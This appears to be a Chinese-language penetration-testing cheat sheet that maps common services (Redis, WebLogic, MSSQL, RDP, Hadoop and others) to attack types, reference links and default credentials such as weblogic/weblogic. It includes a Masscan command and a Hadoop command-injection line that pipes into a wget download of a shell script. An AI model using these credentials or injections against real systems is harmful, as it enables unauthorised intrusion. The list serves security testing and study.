快速扫描:Masscan -p80,800 ip --rate=10000
匿名/暴力破解
拒绝服务
暴力破解
Winbox(cve-2018-14847)
为什么需要telnet?
telnet就是查看某个端口是否可访问。我们在搞开发的时候,经常要用的端口就是 8080。那么你可以启动服务器,用telnet 去查看这个端口是否可用。
邮件伪造
弱口令
https://blog.csdn.net/archersaber39/article/details/78932252
匿名访问
https://www.cnblogs.com/persuit/p/5706432.html
ladp注入
http://www.4hou.com/technology/9090.html
https://www.freebuf.com/articles/web/149059.html
openssl心脏出血
https://paper.seebug.org/437/
http://www.anquan.us/static/drops/papers-1381.html
https://www.freebuf.com/sectool/33191.html
win10拒绝服务
永恒之蓝RCE
匿名访问
http://www.anquan.us/static/bugs/wooyun-2016-0190815.html
https://paper.seebug.org/409/
http://www.91ri.org/11093.html
暴力破解
http://www.anquan.us/static/drops/tips-12749. html
https://www.seebug.org/appdir/Microsoft%20SQL%20Server
暴力破解
https://www.exploit-db.com/exploits/33084
http://www.anquan.us/static/bugs/wooyun-2013-047409.html
RCE
http://www.91ri.org/17511.html
CVE-2015-0411
hash破解
https://www.freebuf.com/column/153561.html
waf绕过
https://www.freebuf.com/articles/web/155570.html
general_log_file getshell
https://www.freebuf.com/column/143125.html
提权
http://www.91ri.org/16540.html
getshell
https://www.secpulse.com/archives/23927.html
shift 放大镜 输入法绕过 guest用户
永恒之蓝(ESTEEMAUDIT)
https://www.freebuf.com/articles/system/132171.html
https://www.anquanke.com/post/id/86328
ms12-020
https://blog.csdn.net/meyo_leo/article/details/77950552
https://www.secpulse.com/archives/29500.html
文件读取
https://www.secpulse.com/archives/42277.html
https://www.anquanke.com/post/id/85948
GlassFish2/ admin:admin
GlassFish3,4/ 如果管理员不设置帐号本地会自动登录,远程访问会提示配置错误
RCE
https://www.cnblogs.com/KevinGeorge/p/8521496.html
https://www.secpulse.com/archives/69153.html
默认账号postgres
参考
http://www.91ri.org/13070.html
http://www.91ri.org/6507.html
(guest/guest)
https://www.seebug.org/appdir/RealVNC
http://xxx:5984/_utils/
CLI 未授权
https://www.secpulse.com/archives/10681.html
Redis
未授权
ssh publickey
crontab
webshell
反序列化
开机自启文件夹写bat
参考https://www.freebuf.com/column/170710.html
默认弱口令
weblogic/weblogic ,weblogic/welcom ,weblogic/welcom1,weblogic1/weblogic
反序列
CVE-2018-2628
https://www.freebuf.com/articles/web/169770.html
https://www.seebug.org/appdir/WebLogic
CVE-2015-1427
http://www.anquan.us/static/drops/papers-5142.html
CVE-2018-17246
https://www.seebug.org/vuldb/ssvid-97730
参考
https://www.seebug.org/search/?keywords=elasticsearch
https://paper.seebug.org/289/
Websphere8.5
https://localhost:9043/ibm/console/logon.jsp
Websphere6-7
http://localhost:9043/ibm/console
后台未授权,登录后可部署WAR包
SOAP服务有反序列化
弱口令:admin /password
未授权
UDP反射
https://shockerli.net/post/memcached-udp-reflection-attack-bug/
未授权
注入
https://www.anquanke.com/post/id/83763
phpMoAdmin RCE
https://www.aqniu.com/threat-alert/6978.html
SAP命令执行
https://www.secpulse.com/archives/20204.html
未授权
https://www.freebuf.com/vuls/173638.html
命令执行
host:50060/pstack?pid=123|wget http://somehost/shell.sh
https://www.seebug.org/search/?keywords=hadoop
其他
http://www.91ri.org/15441.html